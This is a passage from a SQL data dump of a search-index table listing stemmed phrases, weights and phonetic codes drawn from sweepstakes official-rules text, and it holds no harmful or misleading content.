rigors',0,1,1.7,'T25246262',1,'en'),(28884,'the above or','the above or',0,1,1.4,'T160',1,'en'),(28885,'the actual','the actual',0,1,1.3333,'T234',2,'en'),(28886,'the actual date','the actual date',0,1,1.5,'T2343',1,'en'),(28887,'the address','the address',0,1,1.3667,'T620',1,'en'),(28888,'the address stated','the address stated',0,1,1.6,'T623',1,'en'),(28889,'the affidavit','the affidavit',0,1,1.4333,'T1313',1,'en'),(28890,'the affidavit any','the affidavit any',0,1,1.5667,'T13135',1,'en'),(28891,'the affidavit related','the affidavit related',0,1,1.7,'T1313643',1,'en'),(28892,'the affidavit within','the affidavit within',0,1,1.6667,'T13135',1,'en'),(28893,'the aforesaid','the aforesaid',0,1,1.4333,'T1623',1,'en'),(28894,'the aforesaid cycles','the aforesaid cycles',0,1,1.6667,'T1623242',1,'en'),(28895,'the age','the age',0,1,1.2333,'T200',1,'en'),(28896,'the age of','the age of',0,1,1.3333,'T210',1,'en'),(28897,'the american','the american',0,1,1.4,'T5625',1,'en'),(28898,'the american express','the american express',0,1,1.6667,'T56252162',1,'en'),(28899,'the amount','the amount',0,1,1.3333,'T530',2,'en'),(28900,'the amount of','the amount of',0,1,1.4333,'T531',1,'en'),(28901,'the appropriate','the appropriate',0,1,1.5,'T16163',1,'en'),(28902,'the appropriate portion','the appropriate portion',0,1,1.7667,'T161631635',1,'en'),(28903,'the authority','the authority',0,1,1.4333,'T630',1,'en'),(28904,'the authority to','the authority to',0,1,1.5333,'T630',1,'en'),(28905,'the behaviours','the behaviours',0,1,1.4667,'T162',1,'en'),(28906,'the behaviours of','the behaviours of',0,1,1.5667,'T1621',1,'en'),(28907,'the best quality','the best quality',0,1,1.5333,'T123243',1,'en'),(28908,'the body','the body',0,1,1.2667,'T130',1,'en'),(28909,'the body of','the body of',0,1,1.3667,'T131',1,'en'),(28910,'the collection','the collection',0,1,1.4667,'T24235',2,'en'),(28911,'the collection use','the collection use',0,1,1.6,'T242352',1,'en'),(28912,'the commonwealth','the commonwealth',0,1,1.5333,'T2543',1,'en'),(28913,'the commonwealth of','the commonwealth of',0,1,1.6333,'T25431',1,'en'),(28914,'the contest','the contest',0,1,1.3667,'T25323',1,'en'),(28915,'the contest entrants','the contest entrants',0,1,1.6667,'T25323536532',1,'en'),(28916,'the contest or','the contest or',0,1,1.4667,'T253236',1,'en'),(28917,'the contests','the contests',0,1,1.4,'T253232',1,'en'),(28918,'the contests it','the contests it',0,1,1.5,'T2532323',1,'en'),(28919,'the contests or','the contests or',0,1,1.5,'T2532326',1,'en'),(28920,'the county','the county',0,1,1.3333,'T253',1,'en'),(28921,'the county of','the county of',0,1,1.4333,'T2531',1,'en'),(28922,'the date','the date',0,1,1.2667,'T000',1,'en'),(28923,'the date the','the date the',0,1,1.4,'T000',1,'en'),(28924,'the development','the development',0,1,1.5,'T14153',1,'en'),(28925,'the development abilities','the development abilities',0,1,1.8333,'T141531432',1,'en'),(28926,'the drawing','the drawing',0,1,1.3667,'T652',1,'en'),(28927,'the drawing or','the drawing or',0,1,1.4667,'T6526',1,'en'),(28928,'the drawings','the drawings',0,1,1.4,'T652',1,'en'),(28929,'the drawings and','the drawings and',0,1,1.5333,'T65253',1,'en'),(28930,'the drawings d','the drawings d',0,1,1.4667,'T6523',1,'en'),(28931,'the drawings or','the drawings or',0,1,1.5,'T6526',1,'en'),(28932,'the drawings to','the drawings to',0,1,1.5,'T6523',1,'en'),(28933,'the duration','the duration',0,1,1.4,'T635',1,'en'),(28934,'the duration of','the duration of',0,1,1.5,'T6351',1,'en'),(28935,'the e mail','the e mail',0,1,1.3333,'T540',1,'en'),(28936,'the end','the end',0,1,1.2333,'T530',1,'en'),(28937,'the end of','the end of',0,1,1.3333,'T531',1,'en'),(28938,'the entrant','the entrant',0,1,1.3667,'T53653',1,'en'),(28939,'the entrant especially','the entrant especially',0,1,1.7333,'T536532124',1,'en'),(28940,'the entrant\'s','the entrant',0,1,1.4333,'T536532',1,'en'),(28941,'the entrant\'s sole','the entrant sole',0,1,1.6,'T5365324',1,'en'),(28942,'the entries','the entries',0,1,1.3667,'T5362',1,'en'),(28943,'the entries at','the entries at',0,1,1.4667,'T53623',1,'en'),(28944,'the entry','the entry',0,1,1.3,'T536',1,'en'),(28945,'the entry h','the entry h',0,1,1.3667,'T536',1,'en'),(28946,'the entry material','the entry material',0,1,1.6,'T5365364',1,'en'),(28947,'the entry process','the entry process',0,1,1.5667,'T536162',1,'en'),(28948,'the exception','the exception',0,1,1.4333,'T2135',1,'en'),(28949,'the exception that','the exception that',0,1,1.6,'T21353',1,'en'),(28950,'the extent','the extent',0,1,1.3333,'T2353',1,'en'),(28951,'the extent made','the extent made',0,1,1.5,'T235353',1,'en'),(28952,'the feedback','the feedback',0,1,1.4,'T1312',1,'en'),(28953,'the feedback provided','the feedback provided',0,1,1.7,'T13121613',1,'en'),(28954,'the form','the form',0,1,1.2667,'T165',1,'en'),(28955,'the form completing','the form completing',0,1,1.6333,'T1652514352',1,'en'),(28956,'the gift','the gift',0,1,1.2667,'T213',1,'en'),(28957,'the gift cards','the gift cards',0,1,1.4667,'T2132632',1,'en'),(28958,'the goods','the goods',0,1,1.3,'T232',1,'en'),(28959,'the goods or','the goods or',0,1,1.4,'T2326',1,'en'),(28960,'the house','the house',0,1,1.3,'T200',1,'en'),(28961,'the house of','the house of',0,1,1.4,'T210',1,'en'),(28962,'the image','the image',0,1,1.3,'T520',1,'en'),(28963,'the image or','the image or',0,1,1.4,'T526',1,'en'),(28964,'the immediate','the immediate',0,1,1.4333,'T530',1,'en'),(28965,'the immediate family','the immediate family',0,1,1.6667,'T53154',1,'en'),(28966,'the information','the information',0,1,1.5,'T516535',1,'en'),(28967,'the information stated','the information stated',0,1,1.7333,'T51653523',1,'en'),(28968,'the integrity','the integrity',0,1,1.4333,'T53263',1,'en'),(28969,'the integrity or','the integrity or',0,1,1.5333,'T532636',1,'en'),(28970,'the intended','the intended',0,1,1.4,'T5353',1,'en'),(28971,'the intended recipient','the intended recipient',0,1,1.7333,'T535362153',1,'en'),(28972,'the laws','the laws',0,1,1.2667,'T420',1,'en'),(28973,'the laws of','the laws of',0,1,1.3667,'T421',1,'en'),(28974,'the least','the least',0,1,1.3,'T423',1,'en'),(28975,'the least bit','the least bit',0,1,1.4333,'T42313',1,'en'),(28976,'the limits','the limits',0,1,1.3333,'T4532',1,'en'),(28977,'the limits stated','the limits stated',0,1,1.5667,'T45323',1,'en'),(28978,'the maker','the maker',0,1,1.3,'T526',1,'en'),(28979,'the maker of','the maker of',0,1,1.4,'T5261',1,'en'),(28980,'the managing','the managing',0,1,1.4,'T5252',1,'en'),(28981,'the managing of','the managing of',0,1,1.5,'T52521',1,'en'),(28982,'the net','the net',0,1,1.2333,'T530',1,'en'),(28983,'the net without','the net without',0,1,1.5,'T530',1,'en'),(28984,'the non-public','the non-public',0,1,1.4667,'T5142',1,'en'),(28985,'the non-public jurisdiction','the non-public jurisdiction',0,1,1.9,'T5142623235',1,'en'),(28986,'the not','the not',0,1,1.2333,'T530',1,'en'),(28987,'the not whole','the not whole',0,1,1.4333,'T534',1,'en'),(28988,'the notice','the notice',0,1,1.3333,'T532',1,'en'),(28989,'the notice e','the notice e',0,1,1.4,'T532',1,'en'),(28990,'the notification','the notification',0,1,1.5333,'T531235',1,'en'),(28991,'the notification within','the notification within',0,1,1.7667,'T53123535',1,'en'),(28992,'the official','the official',0,1,1.4,'T124',1,'en'),(28993,'the official rules','the official rules',0,1,1.6,'T124642',1,'en'),(28994,'the operation','the operation',0,1,1.4333,'T1635',1,'en'),(28995,'the operation of','the operation of',0,1,1.5333,'T16351',1,'en'),(28996,'the part','the part',0,1,1.2667,'T163',1,'en'),(28997,'the part of','the part of',0,1,1.3667,'T1631',1,'en'),(28998,'the possible','the possible',0,1,1.4,'T1214',1,'en'),(28999,'the possible winner','the possible winner',0,1,1.6333,'T121456',1,'en'),(29000,'the prize','the prize',0,1,1.3,'T162',1,'en'),(29001,'the prize are','the prize are',0,1,1.4333,'T1626',1,'en'),(29002,'the prize debbie','the prize debbie',0,1,1.5333,'T16231',1,'en'),(29003,'the prize immediate','the prize immediate',0,1,1.6333,'T16253',1,'en'),(29004,'the prize is','the prize is',0,1,1.4,'T162',1,'en'),(29005,'the prize m','the prize m',0,1,1.3667,'T1625',1,'en'),(29006,'the prize not','the prize not',0,1,1.4333,'T16253',1,'en'),(29007,'the prize or','the prize or',0,1,1.4,'T1626',1,'en'),(29008,'the prize please','the prize please',0,1,1.5333,'T162142',1,'en'),(29009,'the prize rests','the prize rests',0,1,1.5,'T1626232',1,'en'),(29010,'the prize unconditionally','the prize unconditionally',0,1,1.8333,'T162525354',1,'en'),(29011,'the prize winner','the prize winner',0,1,1.5333,'T16256',1,'en'),(29012,'the prize you','the prize you',0,1,1.4333,'T162',1,'en'),(29013,'the promotion','the promotion',0,1,1.4333,'T16535',1,'en'),(29014,'the promotion period','the promotion period',0,1,1.6667,'T16535163',1,'en'),(29015,'the province','the province',0,1,1.4,'T16152',1,'en'),(29016,'the province of','the province of',0,1,1.5,'T161521',1,'en'),(29017,'the replacement','the replacement',0,1,1.5,'T614253',1,'en'),(29018,'the replacement of','the replacement of',0,1,1.6,'T6142531',1,'en'),(29019,'the retail','the retail',0,1,1.3333,'T634',1,'en'),(29020,'the retail valuation','the retail valuation',0,1,1.6667,'T6341435',1,'en'),(29021,'the reward','the reward',0,1,1.3333,'T630',1,'en'),(29022,'the reward s','the reward s',0,1,1.4,'T632',1,'en'),(29023,'the right in','the right in',0,1,1.4,'T6235',1,'en'),(29024,'the rights','the rights',0,1,1.3333,'T6232',1,'en'),(29025,'the rights and','the rights and',0,1,1.4667,'T623253',1,'en'),(29026,'the rough','the rough',0,1,1.3,'T620',1,'en'),(29027,'the rough retail','the rough retail',0,1,1.5333,'T62634',1,'en'),(29028,'the same person','the same person',0,1,1.5,'T251625',1,'en'),(29029,'the same residence','the same residence',0,1,1.6,'T2562352',1,'en'),(29030,'the software','the software',0,1,1.4,'T2136',1,'en'),(29031,'the software creator','the software creator',0,1,1.6667,'T21362636',1,'en'),(29032,'the sole','the sole',0,1,1.2667,'T240',1,'en'),(29033,'the sole duty','the sole duty',0,1,1.4333,'T243',1,'en'),(29034,'the sort','the sort',0,1,1.2667,'T263',1,'en'),(29035,'the sort g','the sort g',0,1,1.3333,'T2632',1,'en'),(29036,'the special','the special',0,1,1.3667,'T2124',1,'en'),(29037,'the special promoting','the special promoting',0,1,1.7,'T2124165352',1,'en'),(29038,'the state rules','the state rules',0,1,1.5,'T23642',1,'en'),(29039,'the subject','the subject',0,1,1.3667,'T2123',1,'en'),(29040,'the subject matter','the subject matter',0,1,1.6,'T2123536',1,'en'),(29041,'the sweepstakes','the sweepstakes',0,1,1.5,'T21232',1,'en'),(29042,'the sweepstakes and','the sweepstakes and',0,1,1.6333,'T2123253',1,'en'),(29043,'the sweepstakes entrants','the sweepstakes entrants',0,1,1.8,'T21232536532',1,'en'),(29044,'the sweepstakes multiple','the sweepstakes multiple',0,1,1.8,'T2123254314',1,'en'),(29045,'the sweepstakes or','the sweepstakes or',0,1,1.6,'T212326',1,'en'),(29046,'the sweepstakes portrayed','the sweepstakes portrayed',0,1,1.8333,'T2123216363',1,'en'),(29047,'the sweepstakes promotion','the sweepstakes promotion',0,1,1.8333,'T2123216535',1,'en'),(29048,'the sweepstakes sponsor','the sweepstakes sponsor',0,1,1.7667,'T212321526',1,'en'),(29049,'the sweepstakes will','the sweepstakes will',0,1,1.6667,'T212324',1,'en'),(29050,'the the','the the',0,1,1.2333,'T000',2,'en'),(29051,'the the sweepstakes','the the sweepstakes',0,1,1.6333,'T21232',1,'en'),(29052,'the winner','the winner',0,1,1.3333,'T560',1,'en'),(29053,'the winner agreement','the winner agreement',0,1,1.6667,'T562653',1,'en'),(29054,'the winner nor','the winner nor',0,1,1.4667,'T5656',1,'en'),(29055,'the winner s','the winner s',0,1,1.4,'T562',1,'en'),(29056,'the winner shall','the winner shall',0,1,1.5333,'T5624',1,'en'),(29057,'the winner to','the winner to',0,1,1.4333,'T563',1,'en'),(29058,'the winner will','the winner will',0,1,1.5,'T564',1,'en'),(29059,'the winner winner','the winner winner',0,1,1.5667,'T5656',1,'en'),(29060,'the winner\'s','the winner',0,1,1.4,'T562',1,'en'),(29061,'the winner\'s accountability','the winner accountability',0,1,1.9,'T56253143',1,'en'),(29062,'their affiliates','their affiliates',0,1,1.5333,'T61432',1,'en'),(29063,'their affiliates except','their affiliates except',0,1,1.7667,'T6143213',1,'en'),(29064,'their affiliates sponsor','their affiliates sponsor',0,1,1.8,'T614321526',1,'en'),(29065,'their arv','their arv',0,1,1.3,'T610',1,'en'),(29066,'their arv of','their arv of',0,1,1.4,'T610',1,'en'),(29067,'their info','their info',0,1,1.3333,'T651',1,'en'),(29068,'their info with','their info with',0,1,1.5,'T6513',1,'en'),(29069,'their use','their use',0,1,1.3,'T620',1,'en'),(29070,'their use prize','their use prize',0,1,1.5,'T62162',1,'en'),(29071,'thelizabeth potential','thelizabeth potential',0,1,1.7,'T421313534',1,'en'),(29072,'thelizabeth potential winner','thelizabeth potential winner',0,1,1.9333,'T42131353456',1,'en'),(29073,'these','these',1,0,0.0417,'T200',5,'en'),(29074,'these official','these official',0,1,1.4667,'T2124',1,'en'),(29075,'these official rules','these official rules',0,1,1.6667,'T2124642',1,'en'),(29076,'they are','thei are',0,1,1.2667,'T600',3,'en'),(29077,'they are accepted','thei are accepted',0,1,1.5667,'T6213',1,'en'),(29078,'they live','thei live',0,1,1.3,'T410',1,'en'),(29079,'they live family','thei live family',0,1,1.5333,'T4154',1,'en'),(29080,'they may','thei may',0,1,1.2667,'T500',1,'en'),(29081,'they may have.9.daily','thei may have.9.daily',0,1,1.7,'T5134',1,'en'),(29082,'thing help','thing help',0,1,1.3333,'T5241',1,'en'),(29083,'thing help incorrect','thing help incorrect',0,1,1.6667,'T524152623',1,'en'),(29084,'third ave','third ave',0,1,1.3,'T631',1,'en'),(29085,'third ave 10th','third ave 10th',0,1,1.4667,'T6313',1,'en'),(29086,'third parties','third parties',0,1,1.4333,'T631632',1,'en'),(29087,'third parties other','third parties other',0,1,1.6333,'T63163236',1,'en'),(29088,'third party','third party',0,1,1.3667,'T63163',1,'en'),(29089,'third party sponsor','third party sponsor',0,1,1.6333,'T6316321526',1,'en'),(29090,'this promotion','thi promotion',0,1,1.4667,'T216535',1,'en'),(29091,'this promotion or','thi promotion or',0,1,1.5667,'T2165356',1,'en'),(29092,'this sweepstakes','thi sweepstakes',0,1,1.5333,'T21232',1,'en'),(29093,'this sweepstakes entrants','thi sweepstakes entrants',0,1,1.8333,'T21232536532',1,'en'),(29094,'this sweepstakes et','thi sweepstakes et',0,1,1.6333,'T212323',1,'en'),(29095,'this sweepstakes promotion','thi sweepstakes promotion',0,1,1.8667,'T2123216535',1,'en'),(29096,'thoroughly','thoroughli',0,0,0.6667,'T624',2,'en'),(29097,'thoroughly answer','thoroughli answer',0,1,1.5667,'T624526',1,'en'),(29098,'thoroughly answer unaided','thoroughli answer unaided',0,1,1.8333,'T62452653',1,'en'),(29099,'those who','those who',0,1,1.3,'T200',2,'en'),(29100,'those who have','those who have',0,1,1.4667,'T210',1,'en'),(29101,'tied','ti',0,0,0.2667,'T000',2,'en'),(29102,'tied to','ti to',0,1,1.2333,'T000',1,'en'),(29103,'tied to any','ti to any',0,1,1.3667,'T500',1,'en'),(29104,'time limited','time limited',0,1,1.4,'T5453',1,'en'),(29105,'time limited math','time limited math',0,1,1.5667,'T545353',1,'en'),(29106,'times using','time using',0,1,1.3667,'T5252',1,'en'),(29107,'times using multiple','time using multiple',0,1,1.6667,'T525254314',1,'en'),(29108,'to accept','to accept',0,1,1.3,'T213',1,'en'),(29109,'to accept the','to accept the',0,1,1.4333,'T213',1,'en'),(29110,'to acts','to acts',0,1,1.2333,'T232',1,'en'),(29111,'to acts of','to acts of',0,1,1.3333,'T2321',1,'en'),(29112,'to allow','to allow',0,1,1.2667,'T400',1,'en'),(29113,'to allow sponsor','to allow sponsor',0,1,1.5333,'T421526',1,'en'),(29114,'to any','to any',0,1,1.2,'T500',1,'en'),(29115,'to any and','to any and',0,1,1.3333,'T530',1,'en'),(29116,'to any choice','to any choice',0,1,1.4333,'T520',1,'en'),(29117,'to any depictions','to any depictions',0,1,1.5667,'T5312352',1,'en'),(29118,'to any other','to any other',0,1,1.4,'T536',1,'en'),(29119,'to any third','to any third',0,1,1.4,'T5363',1,'en'),(29120,'to award','to award',0,1,1.2667,'T630',1,'en'),(29121,'to award any','to award any',0,1,1.4,'T635',1,'en'),(29122,'to award the','to award the',0,1,1.4,'T630',1,'en'),(29123,'to be able','to be able',0,1,1.3333,'T140',2,'en'),(29124,'to be an','to be an',0,1,1.2667,'T150',1,'en'),(29125,'to be bound','to be bound',0,1,1.3667,'T153',1,'en'),(29126,'to be given','to be given',0,1,1.3667,'T1215',1,'en'),(29127,'to be governed','to be governed',0,1,1.4667,'T121653',1,'en'),(29128,'to be ineligible','to be ineligible',0,1,1.5333,'T154214',1,'en'),(29129,'to be postmarked','to be postmarked',0,1,1.5333,'T1235623',1,'en'),(29130,'to be received','to be received',0,1,1.4667,'T16213',1,'en'),(29131,'to cancel','to cancel',0,1,1.3,'T2524',1,'en'),(29132,'to cancel transform','to cancel transform',0,1,1.6333,'T25243652165',1,'en'),(29133,'to comply','to comply',0,1,1.3,'T2514',1,'en'),(29134,'to comply with','to comply with',0,1,1.4667,'T25143',1,'en'),(29135,'to development','to development',0,1,1.4667,'T14153',1,'en'),(29136,'to development contest','to development contest',0,1,1.7333,'T1415325323',1,'en'),(29137,'to disqualify','to disqualify',0,1,1.4333,'T241',1,'en'),(29138,'to disqualify someone','to disqualify someone',0,1,1.7,'T24125',1,'en'),(29139,'to do with','to do with',0,1,1.3333,'T000',2,'en'),(29140,'to enter','to enter',0,1,1.2667,'T536',1,'en'),(29141,'to enter or','to enter or',0,1,1.3667,'T536',1,'en'),(29142,'to enter the','to enter the',0,1,1.4,'T5363',1,'en'),(29143,'to enter this','to enter this',0,1,1.4333,'T53632',1,'en'),(29144,'to entrants','to entrants',0,1,1.3667,'T536532',1,'en'),(29145,'to entrants or','to entrants or',0,1,1.4667,'T5365326',1,'en'),(29146,'to entrants with','to entrants with',0,1,1.5333,'T5365323',1,'en'),(29147,'to fulfill','to fulfill',0,1,1.3333,'T1414',1,'en'),(29148,'to fulfill the','to fulfill the',0,1,1.4667,'T14143',1,'en'),(29149,'to guide','to guide',0,1,1.2667,'T230',1,'en'),(29150,'to guide to','to guide to',0,1,1.3667,'T230',1,'en'),(29151,'to impress','to impress',0,1,1.3333,'T5162',1,'en'),(29152,'to impress television','to impress television',0,1,1.7,'T516234125',1,'en'),(29153,'to include','to include',0,1,1.3333,'T5243',3,'en'),(29154,'to include but','to include but',0,1,1.4667,'T524313',1,'en'),(29155,'to include these','to include these',0,1,1.5333,'T52432',1,'en'),(29156,'to july','to july',0,1,1.2333,'T240',1,'en'),(29157,'to july 19th','to july 19th',0,1,1.4,'T243',1,'en'),(29158,'to liberate','to liberate',0,1,1.3667,'T4163',1,'en'),(29159,'to liberate and','to liberate and',0,1,1.5,'T416353',1,'en'),(29160,'to notify','to notify',0,1,1.3,'T531',1,'en'),(29161,'to notify sponsor','to notify sponsor',0,1,1.5667,'T53121526',1,'en'),(29162,'to one','to one',0,1,1.2,'T500',1,'en'),(29163,'to one 1','to one 1',0,1,1.2667,'T500',1,'en'),(29164,'to one entries','to one entries',0,1,1.4667,'T5362',1,'en'),(29165,'to or','to or',0,1,1.1667,'T600',1,'en'),(29166,'to or resulting','to or resulting',0,1,1.5,'T624352',1,'en'),(29167,'to pattern','to pattern',0,1,1.3333,'T1365',1,'en'),(29168,'to pattern tv','to pattern tv',0,1,1.4333,'T136531',1,'en'),(29169,'to potential','to potential',0,1,1.4,'T13534',1,'en'),(29170,'to potential winner','to potential winner',0,1,1.6333,'T1353456',1,'en'),(29171,'to preparation','to preparation',0,1,1.4667,'T161635',1,'en'),(29172,'to preparation for','to preparation for',0,1,1.6,'T16163516',1,'en'),(29173,'to private','to private',0,1,1.3333,'T1613',1,'en'),(29174,'to private human','to private human',0,1,1.5333,'T16135',1,'en'),(29175,'to redeem','to redeem',0,1,1.3,'T635',1,'en'),(29176,'to redeem his','to redeem his',0,1,1.4333,'T6352',1,'en'),(29177,'to replace','to replace',0,1,1.3333,'T6142',1,'en'),(29178,'to replace a','to replace a',0,1,1.4,'T6142',1,'en'),(29179,'to sponsor','to sponsor',0,1,1.3333,'T21526',1,'en'),(29180,'to sponsor and','to sponsor and',0,1,1.4667,'T2152653',1,'en'),(29181,'to sponsor privacy','to sponsor privacy',0,1,1.6,'T215261612',1,'en'),(29182,'to sponsor the','to sponsor the',0,1,1.4667,'T215263',1,'en'),(29183,'to sposnor','to sposnor',0,1,1.3333,'T21256',1,'en'),(29184,'to sposnor privacy','to sposnor privacy',0,1,1.6,'T212561612',1,'en'),(29185,'to stevegriffin','to stevegriffin',0,1,1.5,'T2312615',1,'en'),(29186,'to stevegriffin style','to stevegriffin style',0,1,1.7,'T2312615234',1,'en'),(29187,'to style','to style',0,1,1.2667,'T234',1,'en'),(29188,'to style contest','to style contest',0,1,1.5333,'T23425323',1,'en'),(29189,'to submit','to submit',0,1,1.3,'T2153',1,'en'),(29190,'to submit entries','to submit entries',0,1,1.5667,'T21535362',1,'en'),(29191,'to the address','to the address',0,1,1.4667,'T620',1,'en'),(29192,'to the american','to the american',0,1,1.5,'T5625',1,'en'),(29193,'to the drawings','to the drawings',0,1,1.5,'T652',1,'en'),(29194,'to the extent','to the extent',0,1,1.4333,'T2353',1,'en'),(29195,'to the laws','to the laws',0,1,1.3667,'T420',1,'en'),(29196,'to the non-public','to the non-public',0,1,1.5667,'T5142',1,'en'),(29197,'to the winner','to the winner',0,1,1.4333,'T560',1,'en'),(29198,'to travel','to travel',0,1,1.3,'T614',1,'en'),(29199,'to travel termination','to travel termination',0,1,1.7,'T61436535',1,'en'),(29200,'to triumph','to triumph',0,1,1.3333,'T651',1,'en'),(29201,'to triumph in','to triumph in',0,1,1.4333,'T6515',1,'en'),(29202,'to use and','to use and',0,1,1.3333,'T253',1,'en'),(29203,'to void','to void',0,1,1.2333,'T130',1,'en'),(29204,'to void the','to void the',0,1,1.3667,'T130',1,'en'),(29205,'told','told',0,0,0.2667,'T430',2,'en'),(29206,'told in','told in',0,1,1.2333,'T435',1,'en'),(29207,'told in addition','told in addition',0,1,1.5333,'T43535',1,'en'),(29208,'total','total',0,0,0.3333,'T400',2,'en'),(29209,'total of','total of',0,1,1.2667,'T410',2,'en'),(29210,'total of one','total of one',0,1,1.4,'T415',1,'en'),(29211,'trade and','trade and',0,1,1.3,'T6353',1,'en'),(29212,'trade and or','trade and or',0,1,1.4,'T63536',1,'en'),(29213,'trademark','trademark',0,0,0.6,'T63562',1,'en'),(29214,'trademark of','trademark of',0,1,1.4,'T635621',1,'en'),(29215,'trademark of yankee','trademark of yankee',0,1,1.6333,'T63562152',1,'en'),(29216,'transform','transform',0,0,0.6,'T652165',1,'en'),(29217,'transform sponsor','transform sponsor',0,1,1.5667,'T65216521526',1,'en'),(29218,'transform sponsor and','transform sponsor and',0,1,1.7,'T6521652152653',1,'en'),(29219,'travel termination','travel termination',0,1,1.6,'T61436535',1,'en'),(29220,'travel termination delays','travel termination delays',0,1,1.8333,'T61436535342',1,'en'),(29221,'triumph','triumph',0,0,0.4667,'T651',2,'en'),(29222,'triumph in','triumph in',0,1,1.3333,'T6515',1,'en'),(29223,'triumph in must','triumph in must',0,1,1.5,'T651523',1,'en'),(29224,'truly or','truli or',0,1,1.2667,'T646',1,'en'),(29225,'truly or in','truli or in',0,1,1.3667,'T6465',1,'en'),(29226,'tv','tv',0,0,0.1333,'T100',3,'en'),(29227,'tv set','tv set',0,1,1.2,'T123',1,'en'),(29228,'tv set airwaves','tv set airwaves',0,1,1.5,'T123612',1,'en'),(29229,'two 2','two 2',0,1,1.1667,'T000',1,'en'),(29230,'two 2 500','two 2 500',0,1,1.3,'T000',1,'en'),(29231,'uk will','uk will',0,1,1.2333,'U240',1,'en'),(29232,'uk will not','uk will not',0,1,1.3667,'U2453',1,'en'),(29233,'unaided','unaid',0,0,0.4667,'U530',1,'en'),(29234,'unaided a','unaid a',0,1,1.3,'U530',1,'en'),(29235,'unaided a time','unaid a time',0,1,1.4667,'U535',1,'en'),(29236,'unclaimed','unclaim',0,0,0.6,'U52453',1,'en'),(29237,'unclaimed and','unclaim and',0,1,1.4333,'U5245353',1,'en'),(29238,'unclaimed and or','unclaim and or',0,1,1.5333,'U52453536',1,'en'),(29239,'unconditionally','uncondition',0,0,1,'U525354',1,'en'),(29240,'unconditionally m','uncondition m',0,1,1.5667,'U5253545',1,'en'),(29241,'unconditionally m if','uncondition m if',0,1,1.6667,'U52535451',1,'en'),(29242,'uncover','uncov',0,0,0.4667,'U5216',1,'en'),(29243,'uncover testimony','uncov testimony',0,1,1.5667,'U52163235',1,'en'),(29244,'uncover testimony or','uncov testimony or',0,1,1.6667,'U521632356',1,'en'),(29245,'undeliverable','undeliver',0,0,0.8667,'U5341614',1,'en'),(29246,'undeliverable for','undeliver for',0,1,1.5667,'U534161416',1,'en'),(29247,'undeliverable for reasons','undeliver for reasons',0,1,1.8333,'U534161416252',1,'en'),(29248,'under','under',1,0,0.0417,'U536',4,'en'),(29249,'under the','under the',0,1,1.3,'U5363',1,'en'),(29250,'under the managing','under the managing',0,1,1.6,'U53635252',1,'en'),(29251,'unforeseen','unforeseen',0,0,0.6667,'U51625',1,'en'),(29252,'unforeseen events','unforeseen events',0,1,1.5667,'U516251532',1,'en'),(29253,'unforeseen events compromise','unforeseen events compromise',0,1,1.9333,'U51625153251652',1,'en'),(29254,'unintelligible','unintellig',0,0,0.9333,'U534214',1,'en'),(29255,'unintelligible damaged','unintellig damaged',0,1,1.7333,'U5342143523',1,'en'),(29256,'unintelligible damaged or','unintellig damaged or',0,1,1.8333,'U53421435236',1,'en'),(29257,'unknown','unknown',0,0,0.4667,'U525',2,'en'),(29258,'unknown after','unknown after',0,1,1.4333,'U525136',1,'en'),(29259,'unknown after a','unknown after a',0,1,1.5,'U525136',1,'en'),(29260,'unknown or','unknown or',0,1,1.3333,'U5256',1,'en'),(29261,'unknown or perhaps','unknown or perhaps',0,1,1.6,'U52561612',1,'en'),(29262,'unless','unless',0,0,0.4,'U542',1,'en'),(29263,'unless a','unless a',0,1,1.2667,'U542',1,'en'),(29264,'unless a signed','unless a signed',0,1,1.5,'U54253',1,'en'),(29265,'unless banned','unless banned',0,1,1.4333,'U542153',1,'en'),(29266,'unless banned by','unless banned by',0,1,1.5333,'U5421531',1,'en'),(29267,'unless restricted','unless restricted',0,1,1.5667,'U542623623',1,'en'),(29268,'unless restricted by','unless restricted by',0,1,1.6667,'U5426236231',1,'en'),(29269,'unused','unus',0,0,0.4,'U523',1,'en'),(29270,'unused by','unus by',0,1,1.3,'U5231',1,'en'),(29271,'unused by the','unus by the',0,1,1.4333,'U52313',1,'en'),(29272,'upon','upon',1,0,0.0333,'U150',1,'en'),(29273,'upon receipt','upon receipt',0,1,1.4,'U156213',1,'en'),(29274,'upon receipt and','upon receipt and',0,1,1.5333,'U15621353',1,'en'),(29275,'url','url',0,0,0.2,'U640',1,'en'),(29276,'url cell','url cell',0,1,1.2667,'U6424',1,'en'),(29277,'url cell phone','url cell phone',0,1,1.4667,'U642415',1,'en'),(29278,'usages','usag',0,0,0.4,'U200',2,'en'),(29279,'usages only','usag only',0,1,1.3667,'U254',1,'en'),(29280,'usages only all','usag only all',0,1,1.5,'U254',1,'en'),(29281,'use and','us and',0,1,1.2333,'U253',1,'en'),(29282,'use and disclosure','us and disclosure',0,1,1.6,'U2532426',1,'en'),(29283,'use and or','us and or',0,1,1.3333,'U2536',1,'en'),(29284,'use loss','us loss',0,1,1.2667,'U242',1,'en'),(29285,'use loss or','us loss or',0,1,1.3667,'U2426',1,'en'),(29286,'use of any','us of any',0,1,1.3333,'U215',1,'en'),(29287,'use of information','us of information',0,1,1.6,'U21516535',1,'en'),(29288,'use of the','us of the',0,1,1.3333,'U213',1,'en'),(29289,'use or','us or',0,1,1.2,'U260',1,'en'),(29290,'use or misuse','us or misuse',0,1,1.4333,'U2652',1,'en'),(29291,'use prize','us prize',0,1,1.3,'U2162',1,'en'),(29292,'use prize is','us prize is',0,1,1.4,'U2162',1,'en'),(29293,'used for administration','us for administration',0,1,1.7667,'U23163523635',1,'en'),(29294,'uses reasonable','us reasonable',0,1,1.5,'U262514',1,'en'),(29295,'uses reasonable commercial','us reasonable commercial',0,1,1.8667,'U26251425624',1,'en'),(29296,'using advertising','us advertising',0,1,1.5667,'U2523163252',1,'en'),(29297,'using advertising or','us advertising or',0,1,1.6667,'U25231632526',1,'en'),(29298,'using all','us all',0,1,1.3,'U2524',1,'en'),(29299,'using all eligible','us all eligible',0,1,1.6,'U2524214',1,'en'),(29300,'using multiple','us multiple',0,1,1.4667,'U25254314',1,'en'),(29301,'using multiple e','us multiple e',0,1,1.5333,'U25254314',1,'en'),(29302,'using the feedback','us the feedback',0,1,1.6,'U25231312',1,'en'),(29303,'utilizing this','util this',0,1,1.4667,'U3425232',1,'en'),(29304,'utilizing this promotion','util this promotion',0,1,1.8,'U342523216535',1,'en'),(29305,'valid','valid',0,0,0.3333,'V430',1,'en'),(29306,'valid and','valid and',0,1,1.3,'V4353',1,'en'),(29307,'valid and executed','valid and executed',0,1,1.6,'V435323',1,'en'),(29308,'valuation','valuat',0,0,0.6,'V435',1,'en'),(29309,'valuation on','valuat on',0,1,1.4,'V435',1,'en'),(29310,'valuation on 